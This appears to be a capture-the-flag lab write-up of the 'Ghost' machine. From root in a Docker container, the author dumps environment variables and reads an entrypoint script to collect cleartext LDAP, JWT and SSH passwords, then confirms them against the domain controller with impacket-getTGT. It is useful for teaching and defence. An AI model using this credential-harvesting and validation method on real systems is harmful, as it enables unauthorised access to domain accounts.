Docker Container


root@621de11273cb:/# file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f6101dbf7496e744703ecab8c33c2cc348805f7f, for GNU/Linux 3.2.0, stripped
Linux 621de11273cb 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

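The container runs a Debian GNU/Linux 12 (bookworm) userland on the 5.15.0-113-generic kernel; the `#123-Ubuntu` build string in the uname output indicates the kernel belongs to the Docker host, which the container shares.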

Environment Variables


root@621de11273cb:/# env
DATABASE_URL=./database.sqlite
HOSTNAME=621de11273cb
PWD=/
HOME=/root
CARGO_HOME=/usr/local/cargo
LDAP_BIND_DN=CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
LDAP_HOST=ldap://windows-host:389
LDAP_BIND_PASSWORD=He!KA9oKVT3rL99j
TERM=xterm-256color
DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
RUSTUP_HOME=/usr/local/rustup
ROCKET_ADDRESS=0.0.0.0
SHLVL=2
RUST_VERSION=1.79.0
PATH=/usr/local/cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
JWT_SECRET=*xopkAGbLyg9bK_A
_=/usr/bin/env
OLDPWD=/root

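Alongside the DEV_INTRANET_KEY variable, the environment also exposes JWT_SECRET: *xopkAGbLyg9bK_A. Additionally, LDAP_BIND_PASSWORD holds the CLEARTEXT credential of the intranet_principal account: He!KA9oKVT3rL99j. Because these secrets are passed as environment variables, every process started inside the container inherits them.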

Validation for intranet_principal


┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-getTGT GHOST.HTB/intranet_principal@dc01.ghost.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: He!KA9oKVT3rL99j
[*] Saving ticket in intranet_principal@dc01.ghost.htb.ccache

Validated: a TGT was issued for the intranet_principal account, confirming that the password is accepted by the domain.

docker-entrypoint.sh


root@621de11273cb:/# ll
ll
total 80K
4.0K drwxrwxrwt   1 root root 4.0K Jul 15 21:45 tmp
   0 drwxr-xr-x   5 root root  340 Jul 15 17:18 dev
   0 dr-xr-xr-x  13 root root    0 Jul 15 17:18 sys
   0 dr-xr-xr-x 202 root root    0 Jul 15 17:18 proc
4.0K drwx------   1 root root 4.0K Jul  5 15:17 root
4.0K drwxr-xr-x   1 root root 4.0K Jul  5 15:17 .
4.0K drwxr-xr-x   1 root root 4.0K Jul  5 15:17 ..
   0 -rwxr-xr-x   1 root root    0 Jul  5 15:17 .dockerenv
4.0K drwxr-xr-x   1 root root 4.0K Jul  5 15:17 etc
8.0K drwxr-xr-x   1 root root 4.0K Jul  5 15:15 app
8.0K drwxr-xr-x   1 root root 4.0K Jul  5 14:29 run
   0 lrwxrwxrwx   1 root root    7 Jul  1 00:00 bin -> usr/bin
   0 lrwxrwxrwx   1 root root    7 Jul  1 00:00 lib -> usr/lib
   0 lrwxrwxrwx   1 root root    9 Jul  1 00:00 lib64 -> usr/lib64
4.0K drwxr-xr-x   2 root root 4.0K Jul  1 00:00 media
4.0K drwxr-xr-x   2 root root 4.0K Jul  1 00:00 mnt
4.0K drwxr-xr-x   2 root root 4.0K Jul  1 00:00 opt
   0 lrwxrwxrwx   1 root root    8 Jul  1 00:00 sbin -> usr/sbin
4.0K drwxr-xr-x   2 root root 4.0K Jul  1 00:00 srv
8.0K drwxr-xr-x   1 root root 4.0K Jul  1 00:00 usr
8.0K drwxr-xr-x   1 root root 4.0K Jul  1 00:00 var
4.0K drwxr-xr-x   2 root root 4.0K Mar 29 17:20 boot
4.0K drwxr-xr-x   2 root root 4.0K Mar 29 17:20 home
4.0K -rwxr-xr-x   1 root root  327 Feb  1 08:57 docker-entrypoint.sh

There is an interesting file at the filesystem root: docker-entrypoint.sh

root@621de11273cb:/# cat docker-entrypoint.sh
#!/bin/bash
# Container entrypoint: prepares root's SSH client configuration, opens one
# SSH connection to dev-workstation, then hands the process over to the app.
# NOTE(review): there is no `set -e`, so a failing mkdir or ssh does not stop
# the script before the final exec.
 
# Create root's SSH directory and a subdirectory for multiplexing sockets.
# NOTE(review): no explicit mode is set, so permissions follow the umask, and
# plain `mkdir` reports an error if the directory already exists.
mkdir /root/.ssh
mkdir /root/.ssh/controlmaster
# Write a client config that applies to every host: connection sharing on,
# control socket under ~/.ssh/controlmaster/, master kept open after the first
# session ends. printf turns `%%p` into the literal `%p` token in the file.
# NOTE(review): with `ControlPersist yes` the authenticated master connection
# outlives the `exit` below, so a compromise of this container extends to the
# SSH target. Treat the socket directory as a credential.
printf 'Host *\n  ControlMaster auto\n  ControlPath ~/.ssh/controlmaster/h:%%p\n  ControlPersist yes' > /root/.ssh/config
# Log in once with a password given on the command line and run `exit`.
# NOTE(review): the password is hard-coded in this file (presumably shipped
# with the image) and is passed as a process argument to sshpass;
# host key checking is disabled, so the server's identity is never verified.
# Prefer a key or secret supplied at runtime and a pinned known_hosts entry.
sshpass -p 'uxLmt*udNc6t3HrF' ssh -o "StrictHostKeyChecking no" florence.ramirez@ghost.htb@dev-workstation exit
 
# Replace this shell with the application binary.
exec /app/ghost_intranet

The docker-entrypoint.sh file contains the CLEARTEXT SSH credential of the florence.ramirez user, passed to sshpass with -p: uxLmt*udNc6t3HrF

Validation for florence.ramirez


┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-getTGT GHOST.HTB/florence.ramirez@dc01.ghost.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: uxLmt*udNc6t3HrF
[*] Saving ticket in florence.ramirez@dc01.ghost.htb.ccache

Validated: a TGT was issued for the florence.ramirez user, confirming that the password is accepted by the domain.